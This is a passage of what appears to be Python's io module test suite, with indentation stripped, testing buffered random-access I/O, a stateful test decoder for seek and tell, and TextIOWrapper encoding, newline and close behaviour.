self.check_writes(_peek)
def _peek(bufio):
pos = bufio.tell()
bufio.seek(-1, 1)
bufio.peek(1)
bufio.seek(pos, 0)
self.check_writes(_peek)
def test_writes_and_reads(self):
def _read(bufio):
bufio.seek(-1, 1)
bufio.read(1)
self.check_writes(_read)
def test_writes_and_read1s(self):
def _read1(bufio):
bufio.seek(-1, 1)
bufio.read1(1)
self.check_writes(_read1)
def test_writes_and_readintos(self):
def _read(bufio):
bufio.seek(-1, 1)
bufio.readinto(bytearray(1))
self.check_writes(_read)
def test_write_after_readahead(self):
# Issue #6629: writing after the buffer was filled by readahead should
# first rewind the raw stream.
for overwrite_size in [1, 5]:
raw = self.BytesIO(b"A" * 10)
bufio = self.tp(raw, 4)
# Trigger readahead
self.assertEqual(bufio.read(1), b"A")
self.assertEqual(bufio.tell(), 1)
# Overwriting should rewind the raw stream if needed
bufio.write(b"B" * overwrite_size)
self.assertEqual(bufio.tell(), overwrite_size + 1)
# If the write size was smaller than the buffer size, flush() and
# check that rewind happens.
bufio.flush()
self.assertEqual(bufio.tell(), overwrite_size + 1)
s = raw.getvalue()
self.assertEqual(s,
b"A" + b"B" * overwrite_size + b"A" * (9 - overwrite_size))
def test_write_rewind_write(self):
# Various combinations of reading / writing / seeking backwards / writing again
def mutate(bufio, pos1, pos2):
assert pos2 >= pos1
# Fill the buffer
bufio.seek(pos1)
bufio.read(pos2 - pos1)
bufio.write(b'\x02')
# This writes earlier than the previous write, but still inside
# the buffer.
bufio.seek(pos1)
bufio.write(b'\x01')
b = b"\x80\x81\x82\x83\x84"
for i in range(0, len(b)):
for j in range(i, len(b)):
raw = self.BytesIO(b)
bufio = self.tp(raw, 100)
mutate(bufio, i, j)
bufio.flush()
expected = bytearray(b)
expected[j] = 2
expected[i] = 1
self.assertEqual(raw.getvalue(), expected,
"failed result for i=%d, j=%d" % (i, j))
def test_truncate_after_read_or_write(self):
raw = self.BytesIO(b"A" * 10)
bufio = self.tp(raw, 100)
self.assertEqual(bufio.read(2), b"AA") # the read buffer gets filled
self.assertEqual(bufio.truncate(), 2)
self.assertEqual(bufio.write(b"BB"), 2) # the write buffer increases
self.assertEqual(bufio.truncate(), 4)
def test_misbehaved_io(self):
BufferedReaderTest.test_misbehaved_io(self)
BufferedWriterTest.test_misbehaved_io(self)
def test_interleaved_read_write(self):
# Test for issue #12213
with self.BytesIO(b'abcdefgh') as raw:
with self.tp(raw, 100) as f:
f.write(b"1")
self.assertEqual(f.read(1), b'b')
f.write(b'2')
self.assertEqual(f.read1(1), b'd')
f.write(b'3')
buf = bytearray(1)
f.readinto(buf)
self.assertEqual(buf, b'f')
f.write(b'4')
self.assertEqual(f.peek(1), b'h')
f.flush()
self.assertEqual(raw.getvalue(), b'1b2d3f4h')
with self.BytesIO(b'abc') as raw:
with self.tp(raw, 100) as f:
self.assertEqual(f.read(1), b'a')
f.write(b"2")
self.assertEqual(f.read(1), b'c')
f.flush()
self.assertEqual(raw.getvalue(), b'a2c')
def test_interleaved_readline_write(self):
with self.BytesIO(b'ab\ncdef\ng\n') as raw:
with self.tp(raw) as f:
f.write(b'1')
self.assertEqual(f.readline(), b'b\n')
f.write(b'2')
self.assertEqual(f.readline(), b'def\n')
f.write(b'3')
self.assertEqual(f.readline(), b'\n')
f.flush()
self.assertEqual(raw.getvalue(), b'1b\n2def\n3\n')
# You can't construct a BufferedRandom over a non-seekable stream.
test_unseekable = None
class CBufferedRandomTest(BufferedRandomTest, SizeofTest):
tp = io.BufferedRandom
def test_constructor(self):
BufferedRandomTest.test_constructor(self)
# The allocation can succeed on 32-bit builds, e.g. with more
# than 2GB RAM and a 64-bit kernel.
if sys.maxsize > 0x7FFFFFFF:
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises((OverflowError, MemoryError, ValueError),
bufio.__init__, rawio, sys.maxsize)
def test_garbage_collection(self):
CBufferedReaderTest.test_garbage_collection(self)
CBufferedWriterTest.test_garbage_collection(self)
def test_args_error(self):
# Issue #17275
with self.assertRaisesRegex(TypeError, "BufferedRandom"):
self.tp(io.BytesIO(), 1024, 1024, 1024)
class PyBufferedRandomTest(BufferedRandomTest):
tp = pyio.BufferedRandom
# To fully exercise seek/tell, the StatefulIncrementalDecoder has these
# properties:
# - A single output character can correspond to many bytes of input.
# - The number of input bytes to complete the character can be
# undetermined until the last input byte is received.
# - The number of input bytes can vary depending on previous input.
# - A single input byte can correspond to many characters of output.
# - The number of output characters can be undetermined until the
# last input byte is received.
# - The number of output characters can vary depending on previous input.
class StatefulIncrementalDecoder(codecs.IncrementalDecoder):
"""
For testing seek/tell behavior with a stateful, buffering decoder.
Input is a sequence of words. Words may be fixed-length (length set
by input) or variable-length (period-terminated). In variable-length
mode, extra periods are ignored. Possible words are:
- 'i' followed by a number sets the input length, I (maximum 99).
When I is set to 0, words are period-terminated.
- 'o' followed by a number sets the output length, O (maximum 99).
- Any other word is converted into a word followed by a period on
the output. The output word consists of the input word truncated
or padded out with hyphens to make its length equal to O. If O
is 0, the word is output verbatim without truncating or padding.
I and O are initially set to 1. When I changes, any buffered input is
re-scanned according to the new I. EOF also terminates the last word.
"""
def __init__(self, errors='strict'):
codecs.IncrementalDecoder.__init__(self, errors)
self.reset()
def __repr__(self):
return '<SID %x>' % id(self)
def reset(self):
self.i = 1
self.o = 1
self.buffer = bytearray()
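# Note: the decoder state round-trips through getstate()/setstate() as
# (pending input bytes, i*100 + o); i and o are stored XORed with 1 so
# that a freshly reset decoder reports a state flags value of 0.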
def getstate(self):
i, o = self.i ^ 1, self.o ^ 1 # so that flags = 0 after reset()
return bytes(self.buffer), i*100 + o
def setstate(self, state):
buffer, flags = state
self.buffer = bytearray(buffer)
i, o = divmod(flags, 100)
self.i, self.o = i ^ 1, o ^ 1
def decode(self, input, final=False):
output = ''
for b in input:
if self.i == 0: # variable-length, terminated with period
if b == ord('.'):
if self.buffer:
output += self.process_word()
else:
self.buffer.append(b)
else: # fixed-length, terminate after self.i bytes
self.buffer.append(b)
if len(self.buffer) == self.i:
output += self.process_word()
if final and self.buffer: # EOF terminates the last word
output += self.process_word()
return output
def process_word(self):
output = ''
if self.buffer[0] == ord('i'):
self.i = min(99, int(self.buffer[1:] or 0)) # set input length
elif self.buffer[0] == ord('o'):
self.o = min(99, int(self.buffer[1:] or 0)) # set output length
else:
output = self.buffer.decode('ascii')
if len(output) < self.o:
output += '-'*self.o # pad out with hyphens
if self.o:
output = output[:self.o] # truncate to output length
output += '.'
self.buffer = bytearray()
return output
codecEnabled = False
@classmethod
def lookupTestDecoder(cls, name):
if cls.codecEnabled and name == 'test_decoder':
latin1 = codecs.lookup('latin-1')
return codecs.CodecInfo(
name='test_decoder', encode=latin1.encode, decode=None,
incrementalencoder=None,
streamreader=None, streamwriter=None,
incrementaldecoder=cls)
# Register the above decoder for testing. It is disabled by default;
# individual tests enable it when they need it.
codecs.register(StatefulIncrementalDecoder.lookupTestDecoder)
class StatefulIncrementalDecoderTest(unittest.TestCase):
"""
Make sure the StatefulIncrementalDecoder actually works.
"""
test_cases = [
# I=1, O=1 (fixed-length input == fixed-length output)
(b'abcd', False, 'a.b.c.d.'),
# I=0, O=0 (variable-length input, variable-length output)
(b'oiabcd', True, 'abcd.'),
# I=0, O=0 (should ignore extra periods)
(b'oi...abcd...', True, 'abcd.'),
# I=0, O=6 (variable-length input, fixed-length output)
(b'i.o6.x.xyz.toolongtofit.', False, 'x-----.xyz---.toolon.'),
# I=2, O=6 (fixed-length input < fixed-length output)
(b'i.i2.o6xyz', True, 'xy----.z-----.'),
# I=6, O=3 (fixed-length input > fixed-length output)
(b'i.o3.i6.abcdefghijklmnop', True, 'abc.ghi.mno.'),
# I=0, then 3; O=29, then 15 (with longer output)
(b'i.o29.a.b.cde.o15.abcdefghijabcdefghij.i3.a.b.c.d.ei00k.l.m', True,
'a----------------------------.' +
'b----------------------------.' +
'cde--------------------------.' +
'abcdefghijabcde.' +
'a.b------------.' +
'.c.------------.' +
'd.e------------.' +
'k--------------.' +
'l--------------.' +
'm--------------.')
]
def test_decoder(self):
# Try a few one-shot test cases.
for input, eof, output in self.test_cases:
d = StatefulIncrementalDecoder()
self.assertEqual(d.decode(input, eof), output)
# Also test an unfinished decode, followed by forcing EOF.
d = StatefulIncrementalDecoder()
self.assertEqual(d.decode(b'oiabcd'), '')
self.assertEqual(d.decode(b'', 1), 'abcd.')
class TextIOWrapperTest(unittest.TestCase):
def setUp(self):
self.testdata = b"AAA\r\nBBB\rCCC\r\nDDD\nEEE\r\n"
self.normalized = b"AAA\nBBB\nCCC\nDDD\nEEE\n".decode("ascii")
support.unlink(support.TESTFN)
def tearDown(self):
support.unlink(support.TESTFN)
def test_constructor(self):
r = self.BytesIO(b"\xc3\xa9\n\n")
b = self.BufferedReader(r, 1000)
t = self.TextIOWrapper(b)
t.__init__(b, encoding="latin-1", newline="\r\n")
self.assertEqual(t.encoding, "latin-1")
self.assertEqual(t.line_buffering, False)
t.__init__(b, encoding="utf-8", line_buffering=True)
self.assertEqual(t.encoding, "utf-8")
self.assertEqual(t.line_buffering, True)
self.assertEqual("\xe9\n", t.readline())
self.assertRaises(TypeError, t.__init__, b, newline=42)
self.assertRaises(ValueError, t.__init__, b, newline='xyzzy')
def test_uninitialized(self):
t = self.TextIOWrapper.__new__(self.TextIOWrapper)
del t
t = self.TextIOWrapper.__new__(self.TextIOWrapper)
self.assertRaises(Exception, repr, t)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute',
t.read, 0)
t.__init__(self.MockRawIO())
self.assertEqual(t.read(0), '')
def test_non_text_encoding_codecs_are_rejected(self):
# Ensure the constructor complains if passed a codec that isn't
# marked as a text encoding
# http://bugs.python.org/issue20404
r = self.BytesIO()
b = self.BufferedWriter(r)
with self.assertRaisesRegex(LookupError, "is not a text encoding"):
self.TextIOWrapper(b, encoding="hex")
def test_detach(self):
r = self.BytesIO()
b = self.BufferedWriter(r)
t = self.TextIOWrapper(b)
self.assertIs(t.detach(), b)
t = self.TextIOWrapper(b, encoding="ascii")
t.write("howdy")
self.assertFalse(r.getvalue())
t.detach()
self.assertEqual(r.getvalue(), b"howdy")
self.assertRaises(ValueError, t.detach)
# Operations independent of the detached stream should still work
repr(t)
self.assertEqual(t.encoding, "ascii")
self.assertEqual(t.errors, "strict")
self.assertFalse(t.line_buffering)
def test_repr(self):
raw = self.BytesIO("hello".encode("utf-8"))
b = self.BufferedReader(raw)
t = self.TextIOWrapper(b, encoding="utf-8")
modname = self.TextIOWrapper.__module__
self.assertEqual(repr(t),
"<%s.TextIOWrapper encoding='utf-8'>" % modname)
raw.name = "dummy"
self.assertEqual(repr(t),
"<%s.TextIOWrapper name='dummy' encoding='utf-8'>" % modname)
t.mode = "r"
self.assertEqual(repr(t),
"<%s.TextIOWrapper name='dummy' mode='r' encoding='utf-8'>" % modname)
raw.name = b"dummy"
self.assertEqual(repr(t),
"<%s.TextIOWrapper name=b'dummy' mode='r' encoding='utf-8'>" % modname)
t.buffer.detach()
repr(t) # Should not raise an exception
def test_recursive_repr(self):
# Issue #25455
raw = self.BytesIO()
t = self.TextIOWrapper(raw)
with support.swap_attr(raw, 'name', t):
try:
repr(t) # Should not crash
except RuntimeError:
pass
def test_line_buffering(self):
r = self.BytesIO()
b = self.BufferedWriter(r, 1000)
t = self.TextIOWrapper(b, newline="\n", line_buffering=True)
t.write("X")
self.assertEqual(r.getvalue(), b"") # No flush happened
t.write("Y\nZ")
self.assertEqual(r.getvalue(), b"XY\nZ") # All got flushed
t.write("A\rB")
self.assertEqual(r.getvalue(), b"XY\nZA\rB")
def test_default_encoding(self):
old_environ = dict(os.environ)
try:
# try to get a user preferred encoding different from the current
# locale encoding to check that TextIOWrapper() uses the current
# locale encoding and not the user preferred encoding
for key in ('LC_ALL', 'LANG', 'LC_CTYPE'):
if key in os.environ:
del os.environ[key]
current_locale_encoding = locale.getpreferredencoding(False)
b = self.BytesIO()
t = self.TextIOWrapper(b)
self.assertEqual(t.encoding, current_locale_encoding)
finally:
os.environ.clear()
os.environ.update(old_environ)
@support.cpython_only
def test_device_encoding(self):
# Issue 15989
import _testcapi
b = self.BytesIO()
b.fileno = lambda: _testcapi.INT_MAX + 1
self.assertRaises(OverflowError, self.TextIOWrapper, b)
b.fileno = lambda: _testcapi.UINT_MAX + 1
self.assertRaises(OverflowError, self.TextIOWrapper, b)
def test_encoding(self):
# Check the encoding attribute is always set, and valid
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="utf-8")
self.assertEqual(t.encoding, "utf-8")
t = self.TextIOWrapper(b)
self.assertIsNotNone(t.encoding)
codecs.lookup(t.encoding)
def test_encoding_errors_reading(self):
# (1) default
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii")
self.assertRaises(UnicodeError, t.read)
# (2) explicit strict
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii", errors="strict")
self.assertRaises(UnicodeError, t.read)
# (3) ignore
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii", errors="ignore")
self.assertEqual(t.read(), "abc\n\n")
# (4) replace
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii", errors="replace")
self.assertEqual(t.read(), "abc\n\ufffd\n")
def test_encoding_errors_writing(self):
# (1) default
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii")
self.assertRaises(UnicodeError, t.write, "\xff")
# (2) explicit strict
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii", errors="strict")
self.assertRaises(UnicodeError, t.write, "\xff")
# (3) ignore
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii", errors="ignore",
newline="\n")
t.write("abc\xffdef\n")
t.flush()
self.assertEqual(b.getvalue(), b"abcdef\n")
# (4) replace
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii", errors="replace",
newline="\n")
t.write("abc\xffdef\n")
t.flush()
self.assertEqual(b.getvalue(), b"abc?def\n")
def test_newlines(self):
input_lines = [ "unix\n", "windows\r\n", "os9\r", "last\n", "nonl" ]
tests = [
[ None, [ 'unix\n', 'windows\n', 'os9\n', 'last\n', 'nonl' ] ],
[ '', input_lines ],
[ '\n', [ "unix\n", "windows\r\n", "os9\rlast\n", "nonl" ] ],
[ '\r\n', [ "unix\nwindows\r\n", "os9\rlast\nnonl" ] ],
[ '\r', [ "unix\nwindows\r", "\nos9\r", "last\nnonl" ] ],
]
encodings = (
'utf-8', 'latin-1',
'utf-16', 'utf-16-le', 'utf-16-be',
'utf-32', 'utf-32-le', 'utf-32-be',
)
# Try a range of buffer sizes to test the case where \r is the last
# character in TextIOWrapper._pending_line.
for encoding in encodings:
# XXX: str.encode() should return bytes
data = bytes(''.join(input_lines).encode(encoding))
for do_reads in (False, True):
for bufsize in range(1, 10):
for newline, exp_lines in tests:
bufio = self.BufferedReader(self.BytesIO(data), bufsize)
textio = self.TextIOWrapper(bufio, newline=newline,
encoding=encoding)
if do_reads:
got_lines = []
while True:
c2 = textio.read(2)
if c2 == '':
break
self.assertEqual(len(c2), 2)
got_lines.append(c2 + textio.readline())
else:
got_lines = list(textio)
for got_line, exp_line in zip(got_lines, exp_lines):
self.assertEqual(got_line, exp_line)
self.assertEqual(len(got_lines), len(exp_lines))
def test_newlines_input(self):
testdata = b"AAA\nBB\x00B\nCCC\rDDD\rEEE\r\nFFF\r\nGGG"
normalized = testdata.replace(b"\r\n", b"\n").replace(b"\r", b"\n")
for newline, expected in [
(None, normalized.decode("ascii").splitlines(keepends=True)),
("", testdata.decode("ascii").splitlines(keepends=True)),
("\n", ["AAA\n", "BB\x00B\n", "CCC\rDDD\rEEE\r\n", "FFF\r\n", "GGG"]),
("\r\n", ["AAA\nBB\x00B\nCCC\rDDD\rEEE\r\n", "FFF\r\n", "GGG"]),
("\r", ["AAA\nBB\x00B\nCCC\r", "DDD\r", "EEE\r", "\nFFF\r", "\nGGG"]),
]:
buf = self.BytesIO(testdata)
txt = self.TextIOWrapper(buf, encoding="ascii", newline=newline)
self.assertEqual(txt.readlines(), expected)
txt.seek(0)
self.assertEqual(txt.read(), "".join(expected))
def test_newlines_output(self):
testdict = {
"": b"AAA\nBBB\nCCC\nX\rY\r\nZ",
"\n": b"AAA\nBBB\nCCC\nX\rY\r\nZ",
"\r": b"AAA\rBBB\rCCC\rX\rY\r\rZ",
"\r\n": b"AAA\r\nBBB\r\nCCC\r\nX\rY\r\r\nZ",
}
tests = [(None, testdict[os.linesep])] + sorted(testdict.items())
for newline, expected in tests:
buf = self.BytesIO()
txt = self.TextIOWrapper(buf, encoding="ascii", newline=newline)
txt.write("AAA\nB")
txt.write("BB\nCCC\n")
txt.write("X\rY\r\nZ")
txt.flush()
self.assertEqual(buf.closed, False)
self.assertEqual(buf.getvalue(), expected)
def test_destructor(self):
l = []
base = self.BytesIO
class MyBytesIO(base):
def close(self):
l.append(self.getvalue())
base.close(self)
b = MyBytesIO()
t = self.TextIOWrapper(b, encoding="ascii")
t.write("abc")
del t
support.gc_collect()
self.assertEqual([b"abc"], l)
def test_override_destructor(self):
record = []
class MyTextIO(self.TextIOWrapper):
def __del__(self):
record.append(1)
try:
f = super().__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(2)
super().close()
def flush(self):
record.append(3)
super().flush()
b = self.BytesIO()
t = MyTextIO(b, encoding="ascii")
del t
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
def test_error_through_destructor(self):
# Test that the exception state is not modified by a destructor,
# even if close() fails.
rawio = self.CloseFailureIO()
def f():
self.TextIOWrapper(rawio).xyzzy
with support.captured_output("stderr") as s:
self.assertRaises(AttributeError, f)
s = s.getvalue().strip()
if s:
# The destructor *may* have printed an unraisable error, check it
self.assertEqual(len(s.splitlines()), 1)
self.assertTrue(s.startswith("Exception OSError: "), s)
self.assertTrue(s.endswith(" ignored"), s)
# Systematic tests of the text I/O API
def test_basic_io(self):
for chunksize in (1, 2, 3, 4, 5, 15, 16, 17, 31, 32, 33, 63, 64, 65):
for enc in "ascii", "latin-1", "utf-8" :# , "utf-16-be", "utf-16-le":
f = self.open(support.TESTFN, "w+", encoding=enc)
f._CHUNK_SIZE = chunksize
self.assertEqual(f.write("abc"), 3)
f.close()
f = self.open(support.TESTFN, "r+", encoding=enc)
f._CHUNK_SIZE = chunksize
self.assertEqual(f.tell(), 0)
self.assertEqual(f.read(), "abc")
cookie = f.tell()
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.read(None), "abc")
f.seek(0)
self.assertEqual(f.read(2), "ab")
self.assertEqual(f.read(1), "c")
self.assertEqual(f.read(1), "")
self.assertEqual(f.read(), "")
self.assertEqual(f.tell(), cookie)
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.seek(0, 2), cookie)
self.assertEqual(f.write("def"), 3)
self.assertEqual(f.seek(cookie), cookie)
self.assertEqual(f.read(), "def")
if enc.startswith("utf"):
self.multi_line_test(f, enc)
f.close()
def multi_line_test(self, f, enc):
f.seek(0)
f.truncate()
sample = "s\xff\u0fff\uffff"
wlines = []
for size in (0, 1, 2, 3, 4, 5, 30, 31, 32, 33, 62, 63, 64, 65, 1000):
chars = []
for i in range(size):
chars.append(sample[i % len(sample)])
line = "".join(chars) + "\n"
wlines.append((f.tell(), line))
f.write(line)
f.seek(0)
rlines = []
while True:
pos = f.tell()
line = f.readline()
if not line:
break
rlines.append((pos, line))
self.assertEqual(rlines, wlines)
def test_telling(self):
f = self.open(support.TESTFN, "w+", encoding="utf-8")
p0 = f.tell()
f.write("\xff\n")
p1 = f.tell()
f.write("\xff\n")
p2 = f.tell()
f.seek(0)
self.assertEqual(f.tell(), p0)
self.assertEqual(f.readline(), "\xff\n")
self.assertEqual(f.tell(), p1)
self.assertEqual(f.readline(), "\xff\n")
self.assertEqual(f.tell(), p2)
f.seek(0)
for line in f:
self.assertEqual(line, "\xff\n")
self.assertRaises(OSError, f.tell)
self.assertEqual(f.tell(), p2)
f.close()
def test_seeking(self):
chunk_size = _default_chunk_size()
prefix_size = chunk_size - 2
u_prefix = "a" * prefix_size
prefix = bytes(u_prefix.encode("utf-8"))
self.assertEqual(len(u_prefix), len(prefix))
u_suffix = "\u8888\n"
suffix = bytes(u_suffix.encode("utf-8"))
line = prefix + suffix
with self.open(support.TESTFN, "wb") as f:
f.write(line*2)
with self.open(support.TESTFN, "r", encoding="utf-8") as f:
s = f.read(prefix_size)
self.assertEqual(s, str(prefix, "ascii"))
self.assertEqual(f.tell(), prefix_size)
self.assertEqual(f.readline(), u_suffix)
def test_seeking_too(self):
# Regression test for a specific bug
data = b'\xe0\xbf\xbf\n'
with self.open(support.TESTFN, "wb") as f:
f.write(data)
with self.open(support.TESTFN, "r", encoding="utf-8") as f:
f._CHUNK_SIZE # Just test that it exists
f._CHUNK_SIZE = 2
f.readline()
f.tell()
def test_seek_and_tell(self):
# Test seek/tell using the StatefulIncrementalDecoder.
# Make test faster by doing smaller seeks
CHUNK_SIZE = 128
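# Note: TextIOWrapper.tell() returns an opaque cookie that also encodes
# the incremental decoder's state, so the stateful decoder registered
# above exercises the seek()/tell() machinery far more thoroughly than a
# stateless codec would.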
def test_seek_and_tell_with_data(data, min_pos=0):
"""Tell/seek to various points within a data stream and ensure
that the decoded data returned by read() is consistent."""
f = self.open(support.TESTFN, 'wb')
f.write(data)
f.close()
f = self.open(support.TESTFN, encoding='test_decoder')
f._CHUNK_SIZE = CHUNK_SIZE
decoded = f.read()
f.close()
for i in range(min_pos, len(decoded) + 1): # seek positions
for j in [1, 5, len(decoded) - i]: # read lengths
f = self.open(support.TESTFN, encoding='test_decoder')
self.assertEqual(f.read(i), decoded[:i])
cookie = f.tell()
self.assertEqual(f.read(j), decoded[i:i + j])
f.seek(cookie)
self.assertEqual(f.read(), decoded[i:])
f.close()
# Enable the test decoder.
StatefulIncrementalDecoder.codecEnabled = 1
# Run the tests.
try:
# Try each test case.
for input, _, _ in StatefulIncrementalDecoderTest.test_cases:
test_seek_and_tell_with_data(input)
# Position each test case so that it crosses a chunk boundary.
for input, _, _ in StatefulIncrementalDecoderTest.test_cases:
offset = CHUNK_SIZE - len(input)//2
prefix = b'.'*offset
# Don't bother seeking into the prefix (takes too long).
min_pos = offset*2
test_seek_and_tell_with_data(prefix + input, min_pos)
# Ensure our test decoder won't interfere with subsequent tests.
finally:
StatefulIncrementalDecoder.codecEnabled = 0
def test_encoded_writes(self):
data = "1234567890"
tests = ("utf-16",
"utf-16-le",
"utf-16-be",
"utf-32",
"utf-32-le",
"utf-32-be")
for encoding in tests:
buf = self.BytesIO()
f = self.TextIOWrapper(buf, encoding=encoding)
# Check that the BOM is written only once (see issue #1753).
f.write(data)
f.write(data)
f.seek(0)
self.assertEqual(f.read(), data * 2)
f.seek(0)
self.assertEqual(f.read(), data * 2)
self.assertEqual(buf.getvalue(), (data * 2).encode(encoding))
def test_unreadable(self):
class UnReadable(self.BytesIO):
def readable(self):
return False
txt = self.TextIOWrapper(UnReadable())
self.assertRaises(OSError, txt.read)
def test_read_one_by_one(self):
txt = self.TextIOWrapper(self.BytesIO(b"AA\r\nBB"))
reads = ""
while True:
c = txt.read(1)
if not c:
break
reads += c
self.assertEqual(reads, "AA\nBB")
def test_readlines(self):
txt = self.TextIOWrapper(self.BytesIO(b"AA\nBB\nCC"))
self.assertEqual(txt.readlines(), ["AA\n", "BB\n", "CC"])
txt.seek(0)
self.assertEqual(txt.readlines(None), ["AA\n", "BB\n", "CC"])
txt.seek(0)
self.assertEqual(txt.readlines(5), ["AA\n", "BB\n"])
# Read in amounts equal to TextIOWrapper._CHUNK_SIZE, which is 128.
def test_read_by_chunk(self):
# Make sure "\r\n" straddles the 128-character boundary.
txt = self.TextIOWrapper(self.BytesIO(b"A" * 127 + b"\r\nB"))
reads = ""
while True:
c = txt.read(128)
if not c:
break
reads += c
self.assertEqual(reads, "A"*127+"\nB")
def test_writelines(self):
l = ['ab', 'cd', 'ef']
buf = self.BytesIO()
txt = self.TextIOWrapper(buf)
txt.writelines(l)
txt.flush()
self.assertEqual(buf.getvalue(), b'abcdef')
def test_writelines_userlist(self):
l = UserList(['ab', 'cd', 'ef'])
buf = self.BytesIO()
txt = self.TextIOWrapper(buf)
txt.writelines(l)
txt.flush()
self.assertEqual(buf.getvalue(), b'abcdef')
def test_writelines_error(self):
txt = self.TextIOWrapper(self.BytesIO())
self.assertRaises(TypeError, txt.writelines, [1, 2, 3])
self.assertRaises(TypeError, txt.writelines, None)
self.assertRaises(TypeError, txt.writelines, b'abc')
def test_issue1395_1(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
# read one char at a time
reads = ""
while True:
c = txt.read(1)
if not c:
break
reads += c
self.assertEqual(reads, self.normalized)
def test_issue1395_2(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = ""
while True:
c = txt.read(4)
if not c:
break
reads += c
self.assertEqual(reads, self.normalized)
def test_issue1395_3(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = txt.read(4)
reads += txt.read(4)
reads += txt.readline()
reads += txt.readline()
reads += txt.readline()
self.assertEqual(reads, self.normalized)
def test_issue1395_4(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = txt.read(4)
reads += txt.read()
self.assertEqual(reads, self.normalized)
def test_issue1395_5(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = txt.read(4)
pos = txt.tell()
txt.seek(0)
txt.seek(pos)
self.assertEqual(txt.read(4), "BBB\n")
def test_issue2282(self):
buffer = self.BytesIO(self.testdata)
txt = self.TextIOWrapper(buffer, encoding="ascii")
self.assertEqual(buffer.seekable(), txt.seekable())
def test_append_bom(self):
# The BOM is not written again when appending to a non-empty file
filename = support.TESTFN
for charset in ('utf-8-sig', 'utf-16', 'utf-32'):
with self.open(filename, 'w', encoding=charset) as f:
f.write('aaa')
pos = f.tell()
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'aaa'.encode(charset))
with self.open(filename, 'a', encoding=charset) as f:
f.write('xxx')
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'aaaxxx'.encode(charset))
def test_seek_bom(self):
# Same test, but when seeking manually
filename = support.TESTFN
for charset in ('utf-8-sig', 'utf-16', 'utf-32'):
with self.open(filename, 'w', encoding=charset) as f:
f.write('aaa')
pos = f.tell()
with self.open(filename, 'r+', encoding=charset) as f:
f.seek(pos)
f.write('zzz')
f.seek(0)
f.write('bbb')
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'bbbzzz'.encode(charset))
def test_seek_append_bom(self):
# Same test, but first seek to the start and then to the end
filename = support.TESTFN
for charset in ('utf-8-sig', 'utf-16', 'utf-32'):
with self.open(filename, 'w', encoding=charset) as f:
f.write('aaa')
with self.open(filename, 'a', encoding=charset) as f:
f.seek(0)
f.seek(0, self.SEEK_END)
f.write('xxx')
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'aaaxxx'.encode(charset))
def test_errors_property(self):
with self.open(support.TESTFN, "w") as f:
self.assertEqual(f.errors, "strict")
with self.open(support.TESTFN, "w", errors="replace") as f:
self.assertEqual(f.errors, "replace")
@support.no_tracing
@unittest.skipUnless(threading, 'Threading required for this test.')
def test_threads_write(self):
# Issue #6750: concurrent writes could duplicate data
event = threading.Event()
with self.open(support.TESTFN, "w", buffering=1) as f:
def run(n):
text = "Thread%03d\n" % n
event.wait()
f.write(text)
threads = [threading.Thread(target=run, args=(x,))
for x in range(20)]
with support.start_threads(threads, event.set):
time.sleep(0.02)
with self.open(support.TESTFN) as f:
content = f.read()
for n in range(20):
self.assertEqual(content.count("Thread%03d\n" % n), 1)
def test_flush_error_on_close(self):
# Test that text file is closed despite failed flush
# and that flush() is called before file closed.
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
closed = []
def bad_flush():
closed[:] = [txt.closed, txt.buffer.closed]
raise OSError()
txt.flush = bad_flush
self.assertRaises(OSError, txt.close) # exception not swallowed
self.assertTrue(txt.closed)
self.assertTrue(txt.buffer.closed)
self.assertTrue(closed) # flush() called
self.assertFalse(closed[0]) # flush() called before file closed
self.assertFalse(closed[1])
txt.flush = lambda: None # break reference loop
def test_close_error_on_close(self):
buffer = self.BytesIO(self.testdata)
def bad_flush():
raise OSError('flush')
def bad_close():
raise OSError('close')
buffer.close = bad_close
txt = self.TextIOWrapper(buffer, encoding="ascii")
txt.flush = bad_flush
with self.assertRaises(OSError) as err: # exception not swallowed
txt.close()
self.assertEqual(err.exception.args, ('close',))
self.assertIsInstance(err.exception.__context__, OSError)
self.assertEqual(err.exception.__context__.args, ('flush',))
self.assertFalse(txt.closed)
def test_nonnormalized_close_error_on_close(self):
# Issue #21677
buffer = self.BytesIO(self.testdata)
def bad_flush():
raise non_existing_flush
def bad_close():
raise non_existing_close
buffer.close = bad_close
txt = self.TextIOWrapper(buffer, encoding="ascii")
txt.flush = bad_flush
with self.assertRaises(NameError) as err: # exception not swallowed
txt.close()
self.assertIn('non_existing_close', str(err.exception))
self.assertIsInstance(err.exception.__context__, NameError)
self.assertIn('non_existing_flush', str(err.exception.__context__))
self.assertFalse(txt.closed)
def test_multi_close(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt.close()
txt.close()
txt.close()
self.assertRaises(ValueError, txt.flush)
def test_unseekable(self):
txt = self.TextIOWrapper(self.MockUnseekableIO(self.testdata))
